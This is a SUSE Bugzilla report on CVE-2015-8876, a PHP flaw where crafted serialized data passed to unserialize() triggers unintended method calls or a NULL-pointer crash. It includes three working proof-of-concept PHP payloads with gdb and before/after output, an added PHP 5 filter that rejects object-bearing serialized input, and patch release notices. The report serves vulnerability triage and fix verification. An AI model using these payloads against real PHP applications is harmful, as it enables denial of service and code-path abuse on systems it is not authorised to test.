Bugzilla – Bug 981049
VUL-0: CVE-2015-8876: php5, php53: Zend/zend_exceptions.c does not validate certain Exception objects
Last modified: 2016-08-10 07:22:18 UTC
CVE-2015-8876
Original release date: 05/21/2016
Last revised: 05/21/2016
Source: US-CERT/NIST

Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 does not validate certain Exception objects, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) or trigger unintended method execution via crafted serialized data.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8876
https://bugs.php.net/bug.php?id=70121
bugbot adjusting priority
Reproduced with 13.2 and 12.

Installed packages: php5

$ cat poc1.php
<?php
/*
$ php poc1.php
unexpected
*/
class Pwn { function __toString() { die("surprise\n"); } }
unserialize('O:12:"DateInterval":1:{s:4:"days";O:3:"Pwn":0:{}}');
?>
$
$ cat poc2.php
<?php
/*
$ php poc2.php
surprise 1
surprise 1
surprise 1
surprise 2
*/
class Pwn {
    function __call($x,$y) { die("surprise 2\n"); }
    function __get($x) { echo "surprise 1\n"; }
}
unserialize('O:12:"DateInterval":1:{s:4:"days";O:9:"Exception":7:{s:10:"'."\0".'*'."\0".'message";s:1:"x";s:17:"'."\0".'Exception'."\0".'string";s:1:"A";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";s:1:"a";s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";O:3:"Pwn":0:{}}}');
?>
$
$ cat poc3.php
<?php
/*
gdb$ r poc3.php
Starting program: /usr/bin/php5 d.php
PHP Notice:  Undefined property: stdClass::$message in poc3.php on line 1
PHP Notice:  Undefined property: stdClass::$file in poc3.php on line 1
PHP Notice:  Undefined property: stdClass::$line in poc3.php on line 1

Program received signal SIGSEGV, Segmentation fault.
0x00000000006f52c8 in zim_exception___toString (ht=<optimized out>, return_value=0x7ffff7fc34d8, return_value_ptr=<optimized out>, this_ptr=0x7ffff7fc2f28, return_value_used=<optimized out>) at /build/php5-LRe0pE/php5-5.6.11+dfsg/Zend/zend_exceptions.c:673
673         if (Z_TYPE_P(trace) != IS_STRING) {
gdb$ x/i $pc
=> 0x6f52c8 <zim_exception___toString+568>:    cmp BYTE PTR [rax+0x14],0x6
gdb$ p $rax
$1 = 0x0
*/
unserialize('O:12:"DateInterval":1:{s:4:"days";O:9:"Exception":7:{s:10:"'."\0".'*'."\0".'message";s:1:"x";s:17:"'."\0".'Exception'."\0".'string";s:1:"A";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";s:1:"a";s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";O:8:"stdClass":0:{}}}');
?>
$

BEFORE

$ php poc1.php
surprise
$
$ php poc2.php
surprise 1
surprise 1
surprise 1
surprise 2
$
$ php poc3.php
PHP Notice:  Undefined property: stdClass::$message in /981049/poc3.php on line 22
PHP Notice:  Undefined property: stdClass::$file in /981049/poc3.php on line 22
PHP Notice:  Undefined property: stdClass::$line in /981049/poc3.php on line 22
Segmentation fault (core dumped)
$

AFTER

$ php poc1.php
surprise
$ php poc2.php
$ php poc3.php
$

You see that poc1.php still manifests the bug, but "First one is probably more a design issue than a flaw, by the way I'm quite positive that could be avoided or at least documented." So I am not spending more time on this; upstream probably has not fixed it either.

11sp3 and 11 seem not to be affected:

$ php poc1.php
PHP Notice:  Object of class Pwn could not be converted to int in /981049/poc1.php on line 16
$ php poc2.php
PHP Notice:  Object of class Exception could not be converted to int in /981049/poc2.php on line 23
$ php poc3.php
PHP Notice:  Object of class Exception could not be converted to int in /981049/poc3.php on line 22
$
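All three PoCs above reach the bug by feeding unserialize() an object graph the application never intended to accept. The following is an added defensive example, not code from this bug report, from the reporter, or from PHP upstream: a pre-check for PHP 5.x that refuses any serialized payload containing object (O:, C:) or reference (r:, R:) tokens, so that unserialize() on untrusted input can only ever yield scalars and arrays. The scanner follows the s:LEN:"..." length prefix, so an "O:" inside string content is not a false positive and quotes inside strings cannot desynchronize it. The function names (contains_object_tokens, safe_unserialize) and the benign sample payloads are constructed for this example; the first sample payload is the poc1 string from this report.

```php
<?php
// Added defensive example (not part of this bug report or of PHP upstream).
// On PHP >= 7.0, unserialize($data, array('allowed_classes' => false)) is the
// built-in way to get the same guarantee; this pre-check is for PHP 5.x.

/**
 * Returns true if $data is malformed or would instantiate any object or
 * reference. Only N, b, i, d, s and a tokens are allowed through.
 */
function contains_object_tokens($data)
{
    $len   = strlen($data);
    $pos   = 0;
    $depth = 0;                         // nesting level of a:N:{ ... }
    while ($pos < $len) {
        switch ($data[$pos]) {
            case 'N':                   // N;
                if (substr($data, $pos, 2) !== 'N;') return true;
                $pos += 2;
                break;
            case 'b':                   // b:1;
            case 'i':                   // i:42;
            case 'd':                   // d:1.5;
                $end = strpos($data, ';', $pos);
                if ($end === false) return true;
                $pos = $end + 1;
                break;
            case 's':                   // s:LEN:"bytes";
                $colon = strpos($data, ':', $pos + 2);
                if ($colon === false) return true;
                $digits = substr($data, $pos + 2, $colon - $pos - 2);
                if ($digits === '' || !ctype_digit($digits)) return true;
                $slen  = (int) $digits;
                $start = $colon + 2;    // skip the :" after the length
                // the declared length must land exactly on the closing ";
                if (substr($data, $start + $slen, 2) !== '";') return true;
                $pos = $start + $slen + 2;
                break;
            case 'a':                   // a:COUNT:{
                $brace = strpos($data, '{', $pos);
                if ($brace === false) return true;
                $pos = $brace + 1;
                $depth++;
                break;
            case '}':                   // closes the innermost array
                if ($depth === 0) return true;
                $depth--;
                $pos++;
                break;
            default:                    // O:, C:, r:, R: or garbage
                return true;
        }
    }
    return $depth !== 0;                // unbalanced braces: reject
}

// Wrapper: never hand object-bearing or malformed input to unserialize().
function safe_unserialize($data)
{
    if (!is_string($data) || contains_object_tokens($data)) {
        return false;
    }
    return unserialize($data);
}

// Constructed inputs: the first is poc1 from this report; the others are
// benign or malformed and exercise the string-content and nesting cases.
$cases = array(
    'O:12:"DateInterval":1:{s:4:"days";O:3:"Pwn":0:{}}' => 'rejected',
    'a:2:{i:0;s:5:"hello";s:3:"key";a:1:{i:0;d:1.5;}}'   => 'accepted',
    'a:1:{i:0;s:2:"O:";}'                                => 'accepted',
    'a:1:{i:0;s:10:"x";O:3:"Pwn":0:{}}'                  => 'rejected',
);
foreach ($cases as $payload => $expected) {
    $verdict = contains_object_tokens($payload) ? 'rejected' : 'accepted';
    printf("%-8s (expected %s): %s\n", $verdict, $expected, $payload);
}
```

Running the script prints one line per case with the verdict matching the expected column. The check deliberately rejects rather than sanitizes: a payload that lies about a string length (the last case) is dropped outright, since the only safe answer for untrusted serialized data that does not parse cleanly is to refuse it before unserialize() ever sees it.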
This is an autogenerated message for OBS integration: This bug (981049) was mentioned in https://build.opensuse.org/request/show/397708 13.2 / php5
Packages submitted.
This is an autogenerated message for OBS integration: This bug (981049) was mentioned in https://build.opensuse.org/request/show/399462 13.2 / php5
openSUSE-SU-2016:1553-1: An update that fixes 13 vulnerabilities is now available.

Category: security (important)
Bug References: 976775,980366,980373,980375,981049,981050,981061,982009,982010,982011,982012,982013,982162
CVE References: CVE-2013-7456,CVE-2015-4116,CVE-2015-8873,CVE-2015-8874,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-3074,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096,CVE-2016-5114
Sources used:
openSUSE 13.2 (src): php5-5.6.1-66.1
SUSE-SU-2016:1633-1: An update that fixes 8 vulnerabilities is now available.

Category: security (moderate)
Bug References: 981049,981050,981061,982009,982010,982011,982012,982013
CVE References: CVE-2013-7456,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP1 (src): imap-2007e_suse-19.1
SUSE Linux Enterprise Workstation Extension 12 (src): imap-2007e_suse-19.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src): imap-2007e_suse-19.1, php5-5.5.14-64.5
SUSE Linux Enterprise Software Development Kit 12 (src): imap-2007e_suse-19.1, php5-5.5.14-64.5
SUSE Linux Enterprise Module for Web Scripting 12 (src): imap-2007e_suse-19.1, php5-5.5.14-64.5
SUSE Linux Enterprise Desktop 12-SP1 (src): imap-2007e_suse-19.1
SUSE Linux Enterprise Desktop 12 (src): imap-2007e_suse-19.1
openSUSE-SU-2016:1688-1: An update that fixes 8 vulnerabilities is now available.

Category: security (moderate)
Bug References: 981049,981050,981061,982009,982010,982011,982012,982013
CVE References: CVE-2013-7456,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096
Sources used:
openSUSE Leap 42.1 (src): imap-2007e_suse-22.1, php5-5.5.14-53.1
released